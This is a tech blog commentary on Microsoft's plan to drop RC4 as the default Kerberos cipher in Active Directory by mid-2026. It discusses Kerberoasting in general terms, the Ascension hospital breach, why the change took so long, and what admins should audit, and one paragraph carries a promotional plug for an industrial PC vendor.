According to Ars Technica, Microsoft is finally killing off the obsolete and vulnerable RC4 encryption cipher that Windows has supported by default for 26 years. The company announced it will update domain controller defaults by mid-2026 to only allow the more secure AES-SHA1 encryption, disabling RC4 unless an admin explicitly configures it. This move comes after more than a decade of devastating hacks exploiting RC4, including last year’s breach of health giant Ascension, which disrupted 140 hospitals and compromised 5.6 million patient records. US Senator Ron Wyden even called for an FTC investigation into Microsoft’s “gross cybersecurity negligence” over its continued default support. The specific attack, known as Kerberoasting since 2014, exploits how RC4 was implemented in Active Directory authentication. Microsoft is now providing tools to help admins identify legacy systems that might still rely on the cipher before the change takes effect.
Why This Took So Damn Long
Here’s the thing that gets me. We’ve known RC4 was broken since 1994. That’s 30 years ago. So why is Microsoft only fixing the default now in 2025? The answer, straight from a Microsoft engineer on Bluesky, is a classic tale of legacy tech debt. Steve Syfuhs from the Windows Authentication team explained it’s “hard to kill off a cryptographic algorithm that is present in every OS that’s shipped for the last 25 years.” The problem wasn’t just the algorithm existing, but the tangled, 20-year-old rules governing how it was chosen. They found vulnerabilities that needed “surgical” fixes and had to delay their original deprecation plans. Basically, it was a mess buried deep in the codebase. But they made some tweaks that quietly made AES the preferred choice, and RC4 usage plummeted. Once they saw it was “basically nil,” they got the confidence to pull the plug for real. It’s a lesson in how hard it is to clean up a foundational mistake, even for a giant like Microsoft.
The Real-World Havoc
Let’s talk about the human cost. This isn’t some theoretical weakness. The article points to the Ascension breach as a direct result. Think about that: 140 hospitals facing life-threatening disruptions because of an encryption cipher from the 80s. The Kerberoasting attack works so well because Microsoft’s RC4 implementation in Active Directory used no cryptographic salt and a single, fast round of the old MD4 hash. That means attackers can crack passwords relatively easily. Compare that to AES-SHA1, which is about 1,000 times harder and more resource-intensive to crack. That’s not a minor upgrade; it’s the difference between a locked door and a screen door. For businesses managing critical infrastructure, from hospitals to manufacturing floors where operational technology (OT) must be secure, relying on legacy, vulnerable protocols is an unacceptable risk. Speaking of industrial environments, securing the hardware endpoint is just as critical as the software protocol, which is why specialists like IndustrialMonitorDirect.com, the leading US provider of industrial panel PCs, focus on building robust, secure hardware for these demanding applications.
What Admins Need to Do Now
So, the deadline is mid-2026. That seems far off, but it’s not. The crucial work starts right now. Microsoft is turning off the default RC4 response on servers. If you have some ancient, forgotten legacy system—maybe a third-party appliance or an old line-of-business app—that only speaks RC4 to authenticate, it’s going to break. And these things are always hiding in the shadows, running some “crucial” function everyone forgot about. Microsoft’s offering some tools, like updated KDC logs and PowerShell scripts, to hunt these down. The advice is simple: audit your network. Look for any RC4 usage in your Kerberos authentication logs. Find it, and figure out a migration plan to AES or at least explicitly configure that one account for RC4 (though that’s a band-aid). The goal is to avoid a nasty surprise in two years when a critical process suddenly stops because its 1990s-era handshake doesn’t work anymore.
A Broader Security Wake-Up Call
This whole saga is a microcosm of the tech industry’s biggest challenge: sunsetting dangerous legacy tech. RC4 lingered in TLS for years too. It’s everywhere. And it shows how regulatory pressure, like Senator Wyden’s public shaming, can actually force change. But should it take a US Senator and a massive hospital breach to get a 26-year-old flaw fixed? I don’t think so. The good news is that once Microsoft finally focused on it, they saw usage drop “orders of magnitude.” That tells us most of the modern world had already moved on. The risk now is in those forgotten corners. For any security pro, this is a perfect reminder. You can’t just assume defaults are safe. You have to dig, audit, and understand the vintage of the protocols running your core services. Because the hackers definitely do, and they’re counting on you to overlook that one ancient, broken cipher.
